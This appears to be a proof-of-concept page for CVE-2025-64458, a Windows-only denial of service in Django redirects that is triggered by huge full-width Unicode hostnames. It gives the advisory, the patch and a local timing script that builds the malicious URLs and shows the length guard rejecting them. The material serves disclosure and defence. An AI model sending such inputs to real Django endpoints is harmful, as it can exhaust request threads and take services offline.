
CVE-2025-64458 PoC — Django security vulnerability

Associated Vulnerability
Title: Django security vulnerability (CVE-2025-64458)
Description: Django is an open-source web application framework written in Python and maintained by the Django Software Foundation. It includes an object-relational mapper (ORM), a view system, a template system and more. Django 5.1 before 5.1.14, 4.2 before 4.2.26 and 5.2 before 5.2.8 contain a security vulnerability: NFKC normalization is slow on Windows, which can be abused for a denial-of-service attack.
Description
A PoC script demonstrating CVE-2025-64458 in Django: a potential DoS in `HttpResponseRedirect`/`HttpResponsePermanentRedirect` on Windows.
Readme
# CVE-2025-64458 — Django Redirect DoS on Windows

## Description
A denial-of-service (DoS) issue in Django's redirect responses lets an attacker trigger excessive CPU work during URL parsing when a redirect response is constructed. `HttpResponseRedirectBase.__init__` passes the target through `urlsplit()`, and Python's `urllib.parse` NFKC-normalizes any non-ASCII netloc (via `unicodedata.normalize("NFKC", ...)`) to detect characters that would expand into URL delimiters. On Windows that normalization is particularly slow. As a result, creating `HttpResponseRedirect`/`HttpResponsePermanentRedirect` (or calling `django.shortcuts.redirect()`) with an attacker-controlled, very large Unicode URL can take pathologically long, exhausting request threads and slowing down or taking out the service.

This issue is a follow-up to CVE-2025-27556 and specifically affects Windows because of the performance characteristics of `unicodedata.normalize()` on that platform.

## Impact
- Unauthenticated DoS via any endpoint that reflects or uses a user-supplied redirect target (e.g. `next`/`return_to` query parameters, or application logic that builds a redirect from untrusted input).
- Affects Django's redirect classes `HttpResponseRedirect` (302) and `HttpResponsePermanentRedirect` (301), and therefore `django.shortcuts.redirect()`, which constructs them.
- Severity: moderate under the Django security policy (see the release notes). Linux/macOS are far less affected; Windows shows significant slowdowns.

## What the PoC (`poc.py`) Demonstrates
- Builds extremely long URLs by repeating a full-width Unicode letter in the hostname, e.g. `Ａ` (U+FF21), giving targets such as `https://ＡＡ…/`. Full-width letters are non-ASCII but NFKC-fold to ASCII, so they force the normalization path without producing any delimiter that `urlsplit()` would reject.
- Repeatedly instantiates `HttpResponseRedirect(url)`. The constructor runs `iri_to_uri()` on the target and splits it with `urlsplit()`; the expensive step is the NFKC check that `urlsplit()` applies to the non-ASCII netloc, which is the slow path on Windows.
- Prints the average time per instantiation across increasing URL sizes, showing how the cost grows with very large Unicode inputs.
- On patched Django, overly long redirect targets are rejected early with `DisallowedRedirect` (see Patch Summary), so the expensive normalization never runs.

## Patch Summary (c880530ddd4f)
- Adds a length guard to redirect targets in `HttpResponseRedirectBase.__init__`:
  - Imports `MAX_URL_LENGTH` from `django.utils.http`.
  - Converts the target to `str` and raises `DisallowedRedirect` if `len(redirect_to_str) > MAX_URL_LENGTH` before calling `urlsplit()`.
- Extends tests to ensure excessively long Unicode URLs raise `DisallowedRedirect`.
- Documents the CVE in the 4.2.26, 5.1.14, and 5.2.8 release notes as a Windows‑specific DoS risk due to slow NFKC normalization.
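The following is an added example, not the repository's `poc.py` and not Django code. It reproduces, with the standard library only, the two things the PoC section and the patch summary above describe: the attacker-shaped URL and the `urlsplit()` call that triggers NFKC normalization of the non-ASCII netloc (mirroring the unpatched constructor, minus `iri_to_uri()` and the scheme check), and the c880530ddd4f length guard placed in front of it. `MAX_URL_LENGTH` is assumed to be 2048 here rather than imported from `django.utils.http`, and `DisallowedRedirect` is a local stand-in for Django's exception class; the timings are only meaningful on Windows, where the slow path exists.

```python
"""Stdlib-only reproduction of the CVE-2025-64458 slow path and the upstream guard.

Added example; not Django code and not the repository's poc.py.
"""
import time
import unicodedata
from urllib.parse import urlsplit

# Assumed value of django.utils.http.MAX_URL_LENGTH (not imported from Django).
MAX_URL_LENGTH = 2048

# Full-width Latin capital A: non-ASCII, but NFKC-folds to plain 'A'.
FULLWIDTH_A = "\uff21"


class DisallowedRedirect(Exception):
    """Local stand-in for django.core.exceptions.DisallowedRedirect."""


def build_attack_url(n: int, char: str = FULLWIDTH_A) -> str:
    """Constructed attacker input: a hostname of n repeated full-width letters."""
    return f"https://{char * n}/"


def is_nfkc_foldable(s: str) -> bool:
    """True when NFKC changes the string, i.e. urlsplit() will normalise the netloc."""
    return unicodedata.normalize("NFKC", s) != s


def unpatched_redirect_location(redirect_to) -> str:
    """Mirror of the relevant part of the unpatched HttpResponseRedirectBase.__init__:
    urlsplit() runs on the raw target, and urllib.parse NFKC-normalises any non-ASCII
    netloc to look for characters that expand into '/?#@:'. That normalisation is the
    expensive step on Windows. iri_to_uri() and the allowed_schemes check are omitted."""
    parsed = urlsplit(str(redirect_to))
    return parsed.netloc


def patched_redirect_location(redirect_to) -> str:
    """Same path with the c880530ddd4f guard: reject oversized targets before urlsplit()."""
    redirect_to_str = str(redirect_to)
    if len(redirect_to_str) > MAX_URL_LENGTH:
        raise DisallowedRedirect(
            f"Redirect URL exceeds {MAX_URL_LENGTH} characters ({len(redirect_to_str)})."
        )
    return urlsplit(redirect_to_str).netloc


def time_unpatched(sizes, repeat: int = 5) -> dict:
    """Average seconds per unpatched call for each hostname length (the PoC's measurement)."""
    results = {}
    for n in sizes:
        url = build_attack_url(n)
        start = time.perf_counter()
        for _ in range(repeat):
            unpatched_redirect_location(url)
        results[n] = (time.perf_counter() - start) / repeat
    return results


if __name__ == "__main__":
    for n, secs in time_unpatched([1_000, 10_000, 100_000]).items():
        print(f"hostname length {n:>7}: {secs * 1e3:9.3f} ms per redirect construction")
    try:
        patched_redirect_location(build_attack_url(100_000))
    except DisallowedRedirect as exc:
        print("patched:", exc)
```

Run it on a Windows host to see the per-call time climb with hostname length; on Linux/macOS the same inputs parse quickly, which is the platform difference the advisory describes. The guard rejects a target as soon as its `str()` length exceeds the limit, so the 100,000-character URL never reaches `urlsplit()`; a target of exactly `MAX_URL_LENGTH` characters is still accepted.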

## Affected/Fixed Versions
- Affected: 4.2.x before 4.2.26, 5.1.x before 5.1.14, 5.2.x before 5.2.8.
- Fixed in: 4.2.26, 5.1.14, 5.2.8.
- Earlier patch levels are vulnerable on Windows whenever a redirect target is derived from untrusted input.

## Reference
- Upstream patch diff: https://github.com/django/django/commit/c880530ddd4fabd5939bab0e148bebe36699432a.diff
File Snapshot

[4.0K] /data/pocs/9d6296f9958f996449f3428dfc0fc128cd211f14
├── [1.3K] poc.py
├── [2.6K] README.md
└── [ 46] requirements.txt

1 directory, 3 files